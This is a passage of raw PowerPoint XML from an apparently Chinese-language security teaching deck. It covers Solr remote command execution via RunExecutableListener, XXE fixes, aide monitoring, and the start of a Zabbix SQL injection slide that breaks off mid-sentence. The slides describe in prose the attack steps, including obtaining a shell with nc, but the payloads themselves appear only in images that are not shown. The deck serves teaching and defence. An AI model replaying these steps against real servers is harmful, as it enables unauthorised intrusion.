          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1059745"/>
            <a:ext cx="9905999" cy="5592845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PostMan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>插件，向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器发送一条包含上述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>请求。</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zh-CN" dirty="0"/>
              <a:t>收到服务器的回复为：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>与第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>步相同，更新数据以触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5D35623F-9258-494C-BF6D-C30D69AA4E17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245704" y="1497302"/>
            <a:ext cx="6550502" cy="2504603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{63A81D0C-3AD3-4437-9BEE-2B7A6598CFCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245704" y="4439461"/>
            <a:ext cx="6317770" cy="1487556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38682688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0CEC7A7-4EC2-4919-BACC-E72F2D20C077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288136" y="172067"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{65A63D36-8967-4E3D-A901-A7E86C7F1DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144589" y="1446178"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在攻击端使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令连接服务器端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>即可获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>进入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件夹，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令查看我们上传的脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{BF16C7C3-CAA8-4084-9F2F-9184558BF936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288136" y="2020919"/>
            <a:ext cx="6241720" cy="592968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{BDC282CA-62E1-41F4-AD6F-0B80B97E345B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288136" y="3369578"/>
            <a:ext cx="5099723" cy="2892425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28258271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9EB7B71-C75D-4AF9-A790-0883C6660A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测与防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{35F84529-9371-4CB8-90A4-225716999247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1825417"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>手动修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CoreParser.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件，修补</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>添加了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dbf.setFeature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XMLConstants.FEATURE_SECURE_PROCESSING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, true)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XMLConstants.FEATURE_SECURE_PROCESSING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的话，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的处理进行限制处理，例如限制实体扩展和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>情况，如果处理过程中触发了限制会报告给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SAXParseException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6CCE8080-0598-435E-AE56-78C999A99A15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7134542" y="3795395"/>
            <a:ext cx="3912870" cy="3062605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7764382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E13837E-EB23-4D89-9EEB-9A012FC36E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测与防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{32F01E2D-9003-406D-82BF-EB49AEE85B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RunExecutableListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>类，避免了远程命令执行，修复了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Ddisable.configEdit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>来运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>当再次使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的漏洞向服务器发送恶意数据包时，收到服务器的回复如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{623E188A-625F-4EBF-BD18-8C6917CBFD58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260889" y="3487855"/>
            <a:ext cx="5270500" cy="462915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1E1F772A-7E28-4390-B4B0-7A87027E897B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2568354" y="4643050"/>
            <a:ext cx="3963035" cy="1759585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26652646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99203A8-44DE-44E9-AB9F-E165DD5C0CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="222440"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测与防御结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1367976E-CC1E-4B10-8170-755B62BE5AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1467609"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>aide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>监控文件系统，如果管理员发现监控下的文件出现变化，可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>立即采取措施</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E27E2F50-1842-4B69-89F6-3B42A9C13C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782943" y="2486112"/>
            <a:ext cx="4843668" cy="4157421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24449458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9CA665A-4FD7-499E-AD97-16697C513C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Zabbix 2.0 &lt; 3.0.3 - SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7125F2C7-213B-4EDD-BE3E-22E2711DC880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>是一个基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。能监视各种网络参数，保证服务器系统的安全运营；并提供灵活的通知机制以让系统管理员快速定位、解决存在的各种问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在系统默认开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账户登陆时，攻击者可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入获取系统权限进而进行下一步的攻击。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsrpc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>latest.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两个文件中均存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞，造成该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入的原因是在通过</a:t>
